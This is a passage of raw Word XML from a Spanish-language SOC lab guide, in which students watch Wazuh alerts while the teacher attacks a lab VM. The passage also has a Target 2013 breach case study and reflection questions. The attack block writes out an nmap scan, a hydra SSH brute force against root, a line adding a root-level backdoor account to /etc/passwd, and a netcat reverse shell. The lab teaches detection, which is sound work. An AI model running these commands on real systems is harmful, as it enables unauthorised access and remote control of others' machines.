              <w:t>Componente del lab</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2F3C6B00" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Equivalente empresarial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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2F3C6B01" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rol en el ejercicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B0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F3C6B03" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VM del docente</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F3C6B04" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Servidor SOC central</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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F3C6B05" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Corre el Wazuh Manager + dashboard. </w:t>
            </w:r>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Recibe eventos de todos los agentes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B0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2F3C6B07" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VM de cada alumno</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2F3C6B08" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host corporativo monitoreado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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2F3C6B09" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Corre el Wazuh Agent. Envía eventos al Manager del docente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B0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F3C6B0B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hotspot del celular</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F3C6B0C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Red corporativa interna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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F3C6B0D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Conecta todas las VMs en la misma subnet para que los agentes alcancen el Manager.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B1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2F3C6B0F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ataques del docente</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2F3C6B10" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Red Team / atacante externo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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2F3C6B11" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El docente ejecuta ataques contra su propia VM para que los alumnos vean las alertas en tiempo real.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B1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F3C6B13" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dashboard de Wazuh</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F3C6B14" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Consola del analista SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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F3C6B15" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Los alumnos analizan alertas, correlacionan eventos e identifican el patrón de ataque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6B17" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="8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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B2B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="444444"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="444444"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6B18" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Secuencia de ataques que el docente ejecutará en clase:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B19" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B1A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># FASE 1 — Reconocimiento (Wazuh detecta: Rule 40101, nivel 7)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B1B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>nmap -sV 192.168.x.x     # escaneo de puertos y servicios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B1C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B1D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># FASE 2 — Fuerza bruta SSH (Wazuh detecta: Rule 5710, nivel 10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B1E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.x.x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B1F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B20" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># FASE 3 — Modificación de archivo crítico (Wazuh detecta: Rule 550, nivel 7)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B21" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>echo 'hacker:x:0:0:root:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B22" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B23" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># FASE 4 — Conexión de reverse shell saliente (Wazuh detecta: nivel 12)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B24" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>nc -e /bin/bash 192.168.x.x 4444</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B25" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B26" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Los alumnos verán estas 4 alertas en su dashboard y deberán:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B27" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># 1. Identificar el Rule ID y nivel de cada alerta</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B28" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># 2. Mapear cada alerta con una táctica MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B29" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># 3. Construir la línea de tiempo del ataque</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B2A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># 4. Proponer qué control habría prevenido cada fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6B2C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="12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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B35" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="375623"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="375623"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="375623"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="375623"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFDA"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6B2D" w14:textId="3A705C82" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="375623"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>CASO REAL: Target 2013 — el ataque que un HIDS habría detenido</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B2E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>En diciembre de 2013, atacantes comprometieron la red de Target a través de las credenciales de un proveedor de climatización con acceso remoto a la red corporativa. Desde esa entrada, se movieron lateralmente hasta los sistemas de punto de venta (POS) e instalaron malware que capturaba datos de tarjetas de crédito en memoria — una técnica conocida como RAM scraping.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B2F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F3C6B30" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El ataque afectó 40 millones de tarjetas de crédito y 70 millones de registros personales. Target tenía instalado FireEye, una solución avanzada de seguridad, que detectó el malware y generó alertas. Las alertas fueron ignoradas por el equipo de seguridad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B31" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F3C6B32" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Lo que un HIDS habría aportado específicamente: el malware de RAM scraping requería modificar procesos del sistema POS — exactamente el tipo de actividad que un agente HIDS detecta en tiempo real. Un agente monitoreando los procesos de los sistemas POS habría generado una alerta de Level 13+ cuando el malware se inyectó en la memoria del proceso de pago.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B33" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F3C6B34" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>La lección no es solo técnica: detectar no es suficiente. El SIEM generó alertas. El problema fue que nadie respondió. Un SIEM sin un proceso de respuesta a incidentes definido es solo ruido con mejor interfaz gráfica.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6B36" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="12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121D" w14:paraId="2F3C6B38" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C6B37" w14:textId="48C63BD9" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PREGUNTAS DE REFLEXIÓN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6B3C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7FBFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6B39" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>En el ejemplo de correlación del apartado 2.3, el SIEM conectó tres eventos que llegaron de fuentes distintas en 17 minutos. Sin el SIEM, un analista revisando alertas individualmente probablemente las habría descartado como falsos positivos. ¿Qué criterios usarías para diseñar una regla de correlación que detecte específicamente este patrón — escaneo + brute force + conexión saliente — sin generar demasiados falsos positivos?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6B3A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
